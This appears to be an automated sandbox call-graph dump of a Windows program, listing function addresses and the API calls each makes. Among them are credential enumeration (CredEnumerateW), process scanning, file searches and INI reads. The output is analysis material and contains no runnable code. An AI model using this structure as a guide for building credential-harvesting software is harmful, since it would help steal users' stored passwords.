37711->37712 37713 41ac3f memset 37711->37713 37716 41ac6a 37712->37716 37727 41dc14 19 API calls 37712->37727 37714 41acd9 37713->37714 37714->37701 37717 41aca1 37716->37717 37728 41519d 37716->37728 37717->37714 37719 41acc0 memset 37717->37719 37720 41accd memcpy 37717->37720 37719->37714 37720->37714 37721->37694 37722->37697 37723->37707 37724->37710 37725->37701 37727->37716 37731 4175ed 37728->37731 37739 417570 SetFilePointer 37731->37739 37734 41760a ReadFile 37735 417637 37734->37735 37736 417627 GetLastError 37734->37736 37737 4151b3 37735->37737 37738 41763e memset 37735->37738 37736->37737 37737->37717 37738->37737 37740 4175b2 37739->37740 37741 41759c GetLastError 37739->37741 37740->37734 37740->37737 37741->37740 37742 4175a8 GetLastError 37741->37742 37742->37740 37743->37688 37744 417bc5 37745 417c61 37744->37745 37750 417bda 37744->37750 37746 417bf6 UnmapViewOfFile CloseHandle 37746->37746 37746->37750 37748 417c2c 37748->37750 37756 41851e 20 API calls 37748->37756 37750->37745 37750->37746 37750->37748 37751 4175b7 37750->37751 37752 4175d6 CloseHandle 37751->37752 37753 4175c8 37752->37753 37754 4175df 37752->37754 37753->37754 37755 4175ce Sleep 37753->37755 37754->37750 37755->37752 37756->37748 37757 4152c7 malloc 37758 4152ef 37757->37758 37760 4152e2 37757->37760 37761 416760 11 API calls 37758->37761 37761->37760 37762 4232e8 37763 4232ef 37762->37763 37766 415b2c 37763->37766 37765 423305 37767 415b42 37766->37767 37771 415b46 37766->37771 37768 415b94 37767->37768 37769 415b5a 37767->37769 37767->37771 37773 4438b5 37768->37773 37769->37771 37772 415b79 memcpy 37769->37772 37771->37765 37772->37771 37774 4438d0 37773->37774 37784 4438c9 37773->37784 37787 415378 memcpy memcpy 37774->37787 37784->37771 37788 41276d 37789 41277d 37788->37789 37831 4044a4 LoadLibraryW 37789->37831 37791 412785 37792 412789 37791->37792 37839 414b81 37791->37839 37795 4127c8 37845 412465 memset ??2@YAPAXI 37795->37845 37797 4127ea 37857 40ac21 37797->37857 37802 412813 37875 40dd07 memset 37802->37875 37803 412827 37880 40db69 memset 37803->37880 37806 412822 37901 4125b6 ??3@YAXPAX 37806->37901 37808 40ada2 _wcsicmp 37810 41283d 37808->37810 37810->37806 37813 412863 CoInitialize 37810->37813 37885 41268e 37810->37885 37905 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37813->37905 37816 41296f 37907 40b633 37816->37907 37818 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37823 412957 CoUninitialize 37818->37823 37828 4128ca 37818->37828 37823->37806 37824 4128d0 TranslateAcceleratorW 37825 412941 GetMessageW 37824->37825 37824->37828 37825->37823 37825->37824 37826 412909 IsDialogMessageW 37826->37825 37826->37828 37827 4128fd IsDialogMessageW 37827->37825 37827->37826 37828->37824 37828->37826 37828->37827 37829 41292b TranslateMessage DispatchMessageW 37828->37829 37830 41291f IsDialogMessageW 37828->37830 37829->37825 37830->37825 37830->37829 37832 4044f7 37831->37832 37833 4044cf GetProcAddress 37831->37833 37837 404507 MessageBoxW 37832->37837 37838 40451e 37832->37838 37834 4044e8 FreeLibrary 37833->37834 37835 4044df 37833->37835 37834->37832 37836 4044f3 37834->37836 37835->37834 37836->37832 37837->37791 37838->37791 37840 414b8a 37839->37840 37841 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37839->37841 37911 40a804 memset 37840->37911 37841->37795 37844 414b9e GetProcAddress 37844->37841 37846 4124e0 37845->37846 37847 412505 ??2@YAPAXI 37846->37847 37848 412521 37847->37848 37849 41251c 37847->37849 37922 444722 37848->37922 37933 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37849->37933 37856 41259b wcscpy 37856->37797 37938 40b1ab free free 37857->37938 37861 40ac5c 37862 40a9ce malloc memcpy free free 37861->37862 37863 40ad4b 37861->37863 37865 40ace7 free 37861->37865 37870 40ad76 37861->37870 37942 40a8d0 37861->37942 37954 4099f4 37861->37954 37862->37861 37863->37870 37962 40a9ce 37863->37962 37865->37861 37869 40a8d0 7 API calls 37869->37870 37939 40aa04 37870->37939 37871 40ada2 37872 40adc9 37871->37872 37873 40adaa 37871->37873 37872->37802 37872->37803 37873->37872 37874 40adb3 _wcsicmp 37873->37874 37874->37872 37874->37873 37967 40dce0 37875->37967 37877 40dd3a GetModuleHandleW 37972 40dba7 37877->37972 37881 40dce0 3 API calls 37880->37881 37882 40db99 37881->37882 38044 40dae1 37882->38044 38058 402f3a 37885->38058 37887 412766 37887->37806 37887->37813 37888 4126d3 _wcsicmp 37889 4126a8 37888->37889 37889->37887 37889->37888 37891 41270a 37889->37891 38093 4125f8 7 API calls 37889->38093 37891->37887 38061 411ac5 37891->38061 37902 4125da 37901->37902 37903 4125f0 37902->37903 37904 4125e6 DeleteObject 37902->37904 37906 40b1ab free free 37903->37906 37904->37903 37905->37818 37906->37816 37908 40b640 37907->37908 37909 40b639 free 37907->37909 37910 40b1ab free free 37908->37910 37909->37908 37910->37792 37912 40a83b GetSystemDirectoryW 37911->37912 37913 40a84c wcscpy 37911->37913 37912->37913 37918 409719 wcslen 37913->37918 37916 40a881 LoadLibraryW 37917 40a886 37916->37917 37917->37841 37917->37844 37919 409724 37918->37919 37920 409739 wcscat LoadLibraryW 37918->37920 37919->37920 37921 40972c wcscat 37919->37921 37920->37916 37920->37917 37921->37920 37923 444732 37922->37923 37924 444728 DeleteObject 37922->37924 37934 409cc3 37923->37934 37924->37923 37926 412551 37927 4010f9 37926->37927 37928 401130 37927->37928 37929 401134 GetModuleHandleW LoadIconW 37928->37929 37930 401107 wcsncat 37928->37930 37931 40a7be 37929->37931 37930->37928 37932 40a7d2 37931->37932 37932->37856 37932->37932 37933->37848 37937 409bfd memset wcscpy 37934->37937 37936 409cdb CreateFontIndirectW 37936->37926 37937->37936 37938->37861 37940 40aa14 37939->37940 37941 40aa0a free 37939->37941 37940->37871 37941->37940 37943 40a8eb 37942->37943 37944 40a8df wcslen 37942->37944 37945 40a906 free 37943->37945 37946 40a90f 37943->37946 37944->37943 37947 40a919 37945->37947 37948 4099f4 3 API calls 37946->37948 37949 40a932 37947->37949 37950 40a929 free 37947->37950 37948->37947 37952 4099f4 3 API calls 37949->37952 37951 40a93e memcpy 37950->37951 37951->37861 37953 40a93d 37952->37953 37953->37951 37955 409a41 37954->37955 37956 4099fb malloc 37954->37956 37955->37861 37958 409a37 37956->37958 37959 409a1c 37956->37959 37958->37861 37960 409a30 free 37959->37960 37961 409a20 memcpy 37959->37961 37960->37958 37961->37960 37963 40a9e7 37962->37963 37964 40a9dc free 37962->37964 37965 4099f4 3 API calls 37963->37965 37966 40a9f2 37964->37966 37965->37966 37966->37869 37991 409bca GetModuleFileNameW 37967->37991 37969 40dce6 wcsrchr 37970 40dcf5 37969->37970 37971 40dcf9 wcscat 37969->37971 37970->37971 37971->37877 37992 44db70 37972->37992 37976 40dbfd 37995 4447d9 37976->37995 37979 40dc34 wcscpy wcscpy 38021 40d6f5 37979->38021 37980 40dc1f wcscpy 37980->37979 37983 40d6f5 3 API calls 37984 40dc73 37983->37984 37985 40d6f5 3 API calls 37984->37985 37986 40dc89 37985->37986 37987 40d6f5 3 API calls 37986->37987 37988 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37987->37988 38027 40da80 37988->38027 37991->37969 37993 40dbb4 memset memset 37992->37993 37994 409bca GetModuleFileNameW 37993->37994 37994->37976 37997 4447f4 37995->37997 37996 40dc1b 37996->37979 37996->37980 37997->37996 37998 444807 ??2@YAPAXI 37997->37998 37999 44481f 37998->37999 38000 444873 _snwprintf 37999->38000 38001 4448ab wcscpy 37999->38001 38034 44474a 8 API calls 38000->38034 38003 4448bb 38001->38003 38035 44474a 8 API calls 38003->38035 38004 4448a7 38004->38001 38004->38003 38006 4448cd 38036 44474a 8 API calls 38006->38036 38008 4448e2 38037 44474a 8 API calls 38008->38037 38010 4448f7 38038 44474a 8 API calls 38010->38038 38012 44490c 38039 44474a 8 API calls 38012->38039 38014 444921 38040 44474a 8 API calls 38014->38040 38016 444936 38041 44474a 8 API calls 38016->38041 38018 44494b 38042 44474a 8 API calls 38018->38042 38020 444960 ??3@YAXPAX 38020->37996 38022 44db70 38021->38022 38023 40d702 memset GetPrivateProfileStringW 38022->38023 38024 40d752 38023->38024 38025 40d75c WritePrivateProfileStringW 38023->38025 38024->38025 38026 40d758 38024->38026 38025->38026 38026->37983 38028 44db70 38027->38028 38029 40da8d memset 38028->38029 38030 40daac LoadStringW 38029->38030 38031 40dac6 38030->38031 38031->38030 38033 40dade 38031->38033 38043 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38031->38043 38033->37806 38034->38004 38035->38006 38036->38008 38037->38010 38038->38012 38039->38014 38040->38016 38041->38018 38042->38020 38043->38031 38054 409b98 GetFileAttributesW 38044->38054 38046 40daea 38047 40daef wcscpy wcscpy GetPrivateProfileIntW 38046->38047 38053 40db63 38046->38053 38055 40d65d GetPrivateProfileStringW 38047->38055 38049 40db3e 38056 40d65d GetPrivateProfileStringW 38049->38056 38051 40db4f 38057 40d65d GetPrivateProfileStringW 38051->38057 38053->37808 38054->38046 38055->38049 38056->38051 38057->38053 38094 40eaff 38058->38094 38062 411ae2 memset 38061->38062 38063 411b8f 38061->38063 38134 409bca GetModuleFileNameW 38062->38134 38075 411a8b 38063->38075 38065 411b0a wcsrchr 38066 411b22 wcscat 38065->38066 38067 411b1f 38065->38067 38135 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38066->38135 38067->38066 38069 411b67 38136 402afb 38069->38136 38073 411b7f 38192 40ea13 SendMessageW memset SendMessageW 38073->38192 38076 402afb 27 API calls 38075->38076 38077 411ac0 38076->38077 38078 4110dc 38077->38078 38079 41113e 38078->38079 38084 4110f0 38078->38084 38217 40969c LoadCursorW SetCursor 38079->38217 38081 411143 38091 40b633 free 38081->38091 38218 444a54 38081->38218 38221 4032b4 38081->38221 38082 4110f7 _wcsicmp 38082->38084 38083 411157 38085 40ada2 _wcsicmp 38083->38085 38084->38079 38084->38082 38239 410c46 10 API calls 38084->38239 38088 411167 38085->38088 38086 4111af 38088->38086 38089 4111a6 qsort 38088->38089 38089->38086 38091->38083 38093->37889 38095 40eb10 38094->38095 38107 40e8e0 38095->38107 38098 40eb6c memcpy memcpy 38099 40ebb7 38098->38099 38099->38098 38100 40d134 16 API calls 38099->38100 38101 40ebf2 ??2@YAPAXI ??2@YAPAXI 38099->38101 38100->38099 38102 40ec2e ??2@YAPAXI 38101->38102 38104 40ec65 38101->38104 38102->38104 38117 40ea7f 38104->38117 38106 402f49 38106->37889 38108 40e8f2 38107->38108 38109 40e8eb ??3@YAXPAX 38107->38109 38110 40e900 38108->38110 38111 40e8f9 ??3@YAXPAX 38108->38111 38109->38108 38112 40e911 38110->38112 38113 40e90a ??3@YAXPAX 38110->38113 38111->38110 38114 40e931 ??2@YAPAXI ??2@YAPAXI 38112->38114 38115 40e921 ??3@YAXPAX 38112->38115 38116 40e92a ??3@YAXPAX 38112->38116 38113->38112 38114->38098 38115->38116 38116->38114 38118 40aa04 free 38117->38118 38119 40ea88 38118->38119 38120 40aa04 free 38119->38120 38121 40ea90 38120->38121 38122 40aa04 free 38121->38122 38123 40ea98 38122->38123 38124 40aa04 free 38123->38124 38125 40eaa0 38124->38125 38126 40a9ce 4 API calls 38125->38126 38127 40eab3 38126->38127 38128 40a9ce 4 API calls 38127->38128 38129 40eabd 38128->38129 38130 40a9ce 4 API calls 38129->38130 38131 40eac7 38130->38131 38132 40a9ce 4 API calls 38131->38132 38133 40ead1 38132->38133 38133->38106 38134->38065 38135->38069 38193 40b2cc 38136->38193 38138 402b0a 38139 40b2cc 27 API calls 38138->38139 38140 402b23 38139->38140 38141 40b2cc 27 API calls 38140->38141 38142 402b3a 38141->38142 38143 40b2cc 27 API calls 38142->38143 38144 402b54 38143->38144 38145 40b2cc 27 API calls 38144->38145 38146 402b6b 38145->38146 38147 40b2cc 27 API calls 38146->38147 38148 402b82 38147->38148 38149 40b2cc 27 API calls 38148->38149 38150 402b99 38149->38150 38151 40b2cc 27 API calls 38150->38151 38152 402bb0 38151->38152 38153 40b2cc 27 API calls 38152->38153 38154 402bc7 38153->38154 38155 40b2cc 27 API calls 38154->38155 38156 402bde 38155->38156 38157 40b2cc 27 API calls 38156->38157 38158 402bf5 38157->38158 38159 40b2cc 27 API calls 38158->38159 38160 402c0c 38159->38160 38161 40b2cc 27 API calls 38160->38161 38162 402c23 38161->38162 38163 40b2cc 27 API calls 38162->38163 38164 402c3a 38163->38164 38165 40b2cc 27 API calls 38164->38165 38166 402c51 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402c68 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402c7f 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402c99 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402cb3 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402cd5 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402cf0 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402d0b 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402d26 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402d3e 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402d59 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402d78 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402d93 38189->38190 38191 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38190->38191 38191->38073 38192->38063 38196 40b58d 38193->38196 38195 40b2d1 38195->38138 38197 40b5a4 GetModuleHandleW FindResourceW 38196->38197 38198 40b62e 38196->38198 38199 40b5c2 LoadResource 38197->38199 38201 40b5e7 38197->38201 38198->38195 38200 40b5d0 SizeofResource LockResource 38199->38200 38199->38201 38200->38201 38201->38198 38209 40afcf 38201->38209 38203 40b608 memcpy 38212 40b4d3 memcpy 38203->38212 38205 40b61e 38213 40b3c1 18 API calls 38205->38213 38207 40b626 38214 40b04b 38207->38214 38210 40b04b ??3@YAXPAX 38209->38210 38211 40afd7 ??2@YAPAXI 38210->38211 38211->38203 38212->38205 38213->38207 38215 40b051 ??3@YAXPAX 38214->38215 38216 40b05f 38214->38216 38215->38216 38216->38198 38217->38081 38219 444a64 FreeLibrary 38218->38219 38220 444a83 38218->38220 38219->38220 38220->38083 38222 4032c4 38221->38222 38223 40b633 free 38222->38223 38224 403316 38223->38224 38240 44553b 38224->38240 38228 403480 38438 40368c 15 API calls 38228->38438 38230 403489 38231 40b633 free 38230->38231 38233 403495 38231->38233 38232 40333c 38232->38228 38234 4033a9 memset memcpy 38232->38234 38235 4033ec wcscmp 38232->38235 38436 4028e7 11 API calls 38232->38436 38437 40f508 6 API calls 38232->38437 38233->38083 38234->38232 38234->38235 38235->38232 38238 403421 _wcsicmp 38238->38232 38239->38084 38241 445548 38240->38241 38242 445599 38241->38242 38439 40c768 38241->38439 38243 4455a8 memset 38242->38243 38250 4457f2 38242->38250 38523 403988 38243->38523 38253 445854 38250->38253 38625 403e2d memset memset memset memset memset 38250->38625 38251 4455e5 38262 445672 38251->38262 38267 44560f 38251->38267 38252 4458bb memset memset 38255 414c2e 17 API calls 38252->38255 38306 4458aa 38253->38306 38648 403c9c memset memset memset memset memset 38253->38648 38258 4458f9 38255->38258 38257 44595e memset memset 38265 414c2e 17 API calls 38257->38265 38266 40b2cc 27 API calls 38258->38266 38260 44558c 38507 444b06 38260->38507 38261 44557a 38261->38260 38721 4136c0 CoTaskMemFree 38261->38721 38534 403fbe memset memset memset memset memset 38262->38534 38263 445a00 memset memset 38671 414c2e 38263->38671 38264 445b22 38270 445bca 38264->38270 38271 445b38 memset memset memset 38264->38271 38275 44599c 38265->38275 38277 445909 38266->38277 38279 4087b3 338 API calls 38267->38279 38269 445849 38737 40b1ab free free 38269->38737 38278 445c8b memset memset 38270->38278 38344 445cf0 38270->38344 38282 445bd4 38271->38282 38283 445b98 38271->38283 38276 40b2cc 27 API calls 38275->38276 38290 4459ac 38276->38290 38287 409d1f 6 API calls 38277->38287 38291 414c2e 17 API calls 38278->38291 38288 445621 38279->38288 38280 44589f 38738 40b1ab free free 38280->38738 38281 445585 38722 41366b FreeLibrary 38281->38722 38297 414c2e 17 API calls 38282->38297 38283->38282 38293 445ba2 38283->38293 38286 403335 38435 4452e5 45 API calls 38286->38435 38301 445919 38287->38301 38723 4454bf 20 API calls 38288->38723 38289 445823 38289->38269 38311 4087b3 338 API calls 38289->38311 38302 409d1f 6 API calls 38290->38302 38303 445cc9 38291->38303 38810 4099c6 wcslen 38293->38810 38294 4456b2 38725 40b1ab free free 38294->38725 38296 40b2cc 27 API calls 38307 445a4f 38296->38307 38298 445be2 38297->38298 38309 40b2cc 27 API calls 38298->38309 38299 445d3d 38329 40b2cc 27 API calls 38299->38329 38300 445d88 memset memset memset 38312 414c2e 17 API calls 38300->38312 38739 409b98 GetFileAttributesW 38301->38739 38313 4459bc 38302->38313 38314 409d1f 6 API calls 38303->38314 38304 445879 38304->38280 38325 4087b3 338 API calls 38304->38325 38306->38252 38330 44594a 38306->38330 38687 409d1f wcslen wcslen 38307->38687 38319 445bf3 38309->38319 38311->38289 38322 445dde 38312->38322 38806 409b98 GetFileAttributesW 38313->38806 38324 445ce1 38314->38324 38315 445bb3 38813 445403 memset 38315->38813 38316 445680 38316->38294 38557 4087b3 memset 38316->38557 38328 409d1f 6 API calls 38319->38328 38320 445928 38320->38330 38740 40b6ef 38320->38740 38331 40b2cc 27 API calls 38322->38331 38830 409b98 GetFileAttributesW 38324->38830 38325->38304 38327 40b2cc 27 API calls 38336 445a94 38327->38336 38338 445c07 38328->38338 38339 445d54 _wcsicmp 38329->38339 38330->38257 38343 4459ed 38330->38343 38342 445def 38331->38342 38332 4459cb 38332->38343 38352 40b6ef 253 API calls 38332->38352 38692 40ae18 38336->38692 38337 44566d 38337->38250 38608 413d4c 38337->38608 38348 445389 259 API calls 38338->38348 38349 445d71 38339->38349 38412 445d67 38339->38412 38341 445665 38724 40b1ab free free 38341->38724 38350 409d1f 6 API calls 38342->38350 38343->38263 38343->38264 38344->38286 38344->38299 38344->38300 38345 445389 259 API calls 38345->38270 38354 445c17 38348->38354 38831 445093 23 API calls 38349->38831 38357 445e03 38350->38357 38352->38343 38353 4456d8 38359 40b2cc 27 API calls 38353->38359 38360 40b2cc 27 API calls 38354->38360 38356 44563c 38356->38341 38362 4087b3 338 API calls 38356->38362 38832 409b98 GetFileAttributesW 38357->38832 38358 40b6ef 253 API calls 38358->38286 38364 4456e2 38359->38364 38365 445c23 38360->38365 38361 445d83 38361->38286 38362->38356 38726 413fa6 _wcsicmp _wcsicmp 38364->38726 38369 409d1f 6 API calls 38365->38369 38367 445e12 38373 445e6b 38367->38373 38380 40b2cc 27 API calls 38367->38380 38371 445c37 38369->38371 38370 4456eb 38376 4456fd memset memset memset memset 38370->38376 38377 4457ea 38370->38377 38378 445389 259 API calls 38371->38378 38372 445b17 38807 40aebe 38372->38807 38834 445093 23 API calls 38373->38834 38727 409c70 wcscpy wcsrchr 38376->38727 38730 413d29 38377->38730 38383 445c47 38378->38383 38384 445e33 38380->38384 38381 445e7e 38386 445f67 38381->38386 38389 40b2cc 27 API calls 38383->38389 38390 409d1f 6 API calls 38384->38390 38395 40b2cc 27 API calls 38386->38395 38387 445ab2 memset 38391 40b2cc 27 API calls 38387->38391 38393 445c53 38389->38393 38394 445e47 38390->38394 38396 445aa1 38391->38396 38392 409c70 2 API calls 38397 44577e 38392->38397 38398 409d1f 6 API calls 38393->38398 38833 409b98 GetFileAttributesW 38394->38833 38400 445f73 38395->38400 38396->38372 38396->38387 38401 409d1f 6 API calls 38396->38401 38699 40add4 38396->38699 38704 445389 38396->38704 38713 40ae51 38396->38713 38402 409c70 2 API calls 38397->38402 38403 445c67 38398->38403 38405 409d1f 6 API calls 38400->38405 38401->38396 38406 44578d 38402->38406 38407 445389 259 API calls 38403->38407 38404 445e56 38404->38373 38410 445e83 memset 38404->38410 38408 445f87 38405->38408 38406->38377 38414 40b2cc 27 API calls 38406->38414 38407->38270 38837 409b98 GetFileAttributesW 38408->38837 38413 40b2cc 27 API calls 38410->38413 38412->38286 38412->38358 38415 445eab 38413->38415 38416 4457a8 38414->38416 38417 409d1f 6 API calls 38415->38417 38418 409d1f 6 API calls 38416->38418 38419 445ebf 38417->38419 38420 4457b8 38418->38420 38421 40ae18 9 API calls 38419->38421 38729 409b98 GetFileAttributesW 38420->38729 38431 445ef5 38421->38431 38423 4457c7 38423->38377 38425 4087b3 338 API calls 38423->38425 38424 40ae51 9 API calls 38424->38431 38425->38377 38426 445f5c 38428 40aebe FindClose 38426->38428 38427 40add4 2 API calls 38427->38431 38428->38386 38429 40b2cc 27 API calls 38429->38431 38430 409d1f 6 API calls 38430->38431 38431->38424 38431->38426 38431->38427 38431->38429 38431->38430 38433 445f3a 38431->38433 38835 409b98 GetFileAttributesW 38431->38835 38836 445093 23 API calls 38433->38836 38435->38232 38436->38238 38437->38232 38438->38230 38440 40c775 38439->38440 38838 40b1ab free free 38440->38838 38442 40c788 38839 40b1ab free free 38442->38839 38444 40c790 38840 40b1ab free free 38444->38840 38446 40c798 38447 40aa04 free 38446->38447 38448 40c7a0 38447->38448 38841 40c274 memset 38448->38841 38453 40a8ab 9 API calls 38454 40c7c3 38453->38454 38455 40a8ab 9 API calls 38454->38455 38456 40c7d0 38455->38456 38870 40c3c3 38456->38870 38460 40c877 38469 40bdb0 38460->38469 38461 40c86c 38912 4053fe 39 API calls 38461->38912 38462 40c7e5 38462->38460 38462->38461 38468 40c634 50 API calls 38462->38468 38895 40a706 38462->38895 38468->38462 39195 404363 38469->39195 38472 40bf63 39215 40440c 38472->39215 38473 40bdee 38473->38472 38477 40b2cc 27 API calls 38473->38477 38474 40bddf CredEnumerateW 38474->38473 38478 40be02 wcslen 38477->38478 38479 40bf5d LocalFree 38478->38479 38487 40be1e 38478->38487 38479->38472 38480 40be26 wcsncmp 38480->38487 38483 40be7d memset 38484 40bea7 memcpy 38483->38484 38483->38487 38485 40bf11 wcschr 38484->38485 38484->38487 38485->38487 38486 40b2cc 27 API calls 38488 40bef6 _wcsnicmp 38486->38488 38487->38479 38487->38480 38487->38483 38487->38484 38487->38485 38487->38486 38489 40bf43 LocalFree 38487->38489 39218 40bd5d 28 API calls 38487->39218 39219 404423 38487->39219 38488->38485 38488->38487 38489->38487 38490 4135f7 39234 4135e0 38490->39234 38493 40b2cc 27 API calls 38494 41360d 38493->38494 38495 40a804 8 API calls 38494->38495 38496 413613 38495->38496 38497 41361b 38496->38497 38498 41363e 38496->38498 38499 40b273 27 API calls 38497->38499 38500 4135e0 FreeLibrary 38498->38500 38501 413625 GetProcAddress 38499->38501 38502 413643 38500->38502 38501->38498 38503 413648 38501->38503 38502->38261 38504 413658 38503->38504 38505 4135e0 FreeLibrary 38503->38505 38504->38261 38506 413666 38505->38506 38506->38261 39237 4449b9 38507->39237 38510 444c1f 38510->38242 38511 4449b9 42 API calls 38513 444b4b 38511->38513 38512 444c15 38515 4449b9 42 API calls 38512->38515 38513->38512 39258 444972 GetVersionExW 38513->39258 38515->38510 38516 444b99 memcmp 38521 444b8c 38516->38521 38517 444c0b 39262 444a85 42 API calls 38517->39262 38521->38516 38521->38517 39259 444aa5 42 API calls 38521->39259 39260 40a7a0 GetVersionExW 38521->39260 39261 444a85 42 API calls 38521->39261 38524 40399d 38523->38524 39263 403a16 38524->39263 38527 403a12 wcsrchr 38527->38251 38528 4039a3 38531 4039f4 38528->38531 38533 403a09 38528->38533 39274 40a02c CreateFileW 38528->39274 38532 4099c6 2 API calls 38531->38532 38531->38533 38532->38533 39277 40b1ab free free 38533->39277 38535 414c2e 17 API calls 38534->38535 38536 404048 38535->38536 38537 414c2e 17 API calls 38536->38537 38538 404056 38537->38538 38539 409d1f 6 API calls 38538->38539 38540 404073 38539->38540 38541 409d1f 6 API calls 38540->38541 38542 40408e 38541->38542 38543 409d1f 6 API calls 38542->38543 38544 4040a6 38543->38544 38545 403af5 20 API calls 38544->38545 38546 4040ba 38545->38546 38547 403af5 20 API calls 38546->38547 38548 4040cb 38547->38548 39304 40414f memset 38548->39304 38550 404140 39318 40b1ab free free 38550->39318 38552 4040ec memset 38553 4040e0 38552->38553 38553->38550 38553->38552 38555 4099c6 2 API calls 38553->38555 38556 40a8ab 9 API calls 38553->38556 38554 404148 38554->38316 38555->38553 38556->38553 39331 40a6e6 WideCharToMultiByte 38557->39331 38559 4087ed 39332 4095d9 memset 38559->39332 38562 408809 memset memset memset memset memset 38563 40b2cc 27 API calls 38562->38563 38564 4088a1 38563->38564 38565 409d1f 6 API calls 38564->38565 38566 4088b1 38565->38566 38567 40b2cc 27 API calls 38566->38567 38568 4088c0 38567->38568 38569 409d1f 6 API calls 38568->38569 38570 4088d0 38569->38570 38571 40b2cc 27 API calls 38570->38571 38572 4088df 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 4088ef 38573->38574 38589 408953 38589->38316 38609 40b633 free 38608->38609 38610 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38609->38610 38611 413f00 Process32NextW 38610->38611 38612 413da5 OpenProcess 38611->38612 38613 413f17 CloseHandle 38611->38613 38614 413df3 memset 38612->38614 38617 413eb0 38612->38617 38613->38353 39757 413f27 38614->39757 38616 413ebf free 38616->38617 38617->38611 38617->38616 38618 4099f4 3 API calls 38617->38618 38618->38617 38619 413e37 GetModuleHandleW 38621 413e46 GetProcAddress 38619->38621 38622 413e1f 38619->38622 38621->38622 38622->38619 39762 413959 38622->39762 39778 413ca4 38622->39778 38624 413ea2 CloseHandle 38624->38617 38626 414c2e 17 API calls 38625->38626 38627 403eb7 38626->38627 38628 414c2e 17 API calls 38627->38628 38629 403ec5 38628->38629 38630 409d1f 6 API calls 38629->38630 38631 403ee2 38630->38631 38632 409d1f 6 API calls 38631->38632 38633 403efd 38632->38633 38634 409d1f 6 API calls 38633->38634 38635 403f15 38634->38635 38636 403af5 20 API calls 38635->38636 38637 403f29 38636->38637 38638 403af5 20 API calls 38637->38638 38639 403f3a 38638->38639 38640 40414f 33 API calls 38639->38640 38646 403f4f 38640->38646 38641 403faf 39792 40b1ab free free 38641->39792 38643 403f5b memset 38643->38646 38644 403fb7 38644->38289 38645 4099c6 2 API calls 38645->38646 38646->38641 38646->38643 38646->38645 38647 40a8ab 9 API calls 38646->38647 38647->38646 38649 414c2e 17 API calls 38648->38649 38650 403d26 38649->38650 38651 414c2e 17 API calls 38650->38651 38652 403d34 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 403d51 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403d6c 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 403d84 38657->38658 38659 403af5 20 API calls 38658->38659 38660 403d98 38659->38660 38661 403af5 20 API calls 38660->38661 38662 403da9 38661->38662 38663 40414f 33 API calls 38662->38663 38669 403dbe 38663->38669 38664 403e1e 39793 40b1ab free free 38664->39793 38666 403dca memset 38666->38669 38667 403e26 38667->38304 38668 4099c6 2 API calls 38668->38669 38669->38664 38669->38666 38669->38668 38670 40a8ab 9 API calls 38669->38670 38670->38669 38672 414b81 9 API calls 38671->38672 38673 414c40 38672->38673 38674 414c73 memset 38673->38674 39794 409cea 38673->39794 38676 414c94 38674->38676 39797 414592 RegOpenKeyExW 38676->39797 38679 414c64 SHGetSpecialFolderPathW 38681 414d0b 38679->38681 38680 414cc1 38682 414cf4 wcscpy 38680->38682 39798 414bb0 wcscpy 38680->39798 38681->38296 38682->38681 38684 414cd2 39799 4145ac RegQueryValueExW 38684->39799 38686 414ce9 RegCloseKey 38686->38682 38688 409d62 38687->38688 38689 409d43 wcscpy 38687->38689 38688->38327 38690 409719 2 API calls 38689->38690 38691 409d51 wcscat 38690->38691 38691->38688 38693 40aebe FindClose 38692->38693 38694 40ae21 38693->38694 38695 4099c6 2 API calls 38694->38695 38696 40ae35 38695->38696 38697 409d1f 6 API calls 38696->38697 38698 40ae49 38697->38698 38698->38396 38700 40ade0 38699->38700 38703 40ae0f 38699->38703 38701 40ade7 wcscmp 38700->38701 38700->38703 38702 40adfe wcscmp 38701->38702 38701->38703 38702->38703 38703->38396 38705 40ae18 9 API calls 38704->38705 38710 4453c4 38705->38710 38706 40ae51 9 API calls 38706->38710 38707 4453f3 38709 40aebe FindClose 38707->38709 38708 40add4 2 API calls 38708->38710 38711 4453fe 38709->38711 38710->38706 38710->38707 38710->38708 38712 445403 254 API calls 38710->38712 38711->38396 38712->38710 38714 40ae7b FindNextFileW 38713->38714 38715 40ae5c FindFirstFileW 38713->38715 38716 40ae94 38714->38716 38717 40ae8f 38714->38717 38715->38716 38719 40aeb6 38716->38719 38720 409d1f 6 API calls 38716->38720 38718 40aebe FindClose 38717->38718 38718->38716 38719->38396 38720->38719 38721->38281 38722->38260 38723->38356 38724->38337 38725->38337 38726->38370 38728 409c89 38727->38728 38728->38392 38729->38423 38731 413d39 38730->38731 38732 413d2f FreeLibrary 38730->38732 38733 40b633 free 38731->38733 38732->38731 38734 413d42 38733->38734 38735 40b633 free 38734->38735 38736 413d4a 38735->38736 38736->38250 38737->38253 38738->38306 38739->38320 38741 44db70 38740->38741 38742 40b6fc memset 38741->38742 38743 409c70 2 API calls 38742->38743 38744 40b732 wcsrchr 38743->38744 38745 40b743 38744->38745 38746 40b746 memset 38744->38746 38745->38746 38747 40b2cc 27 API calls 38746->38747 38748 40b76f 38747->38748 38749 409d1f 6 API calls 38748->38749 38750 40b783 38749->38750 39800 409b98 GetFileAttributesW 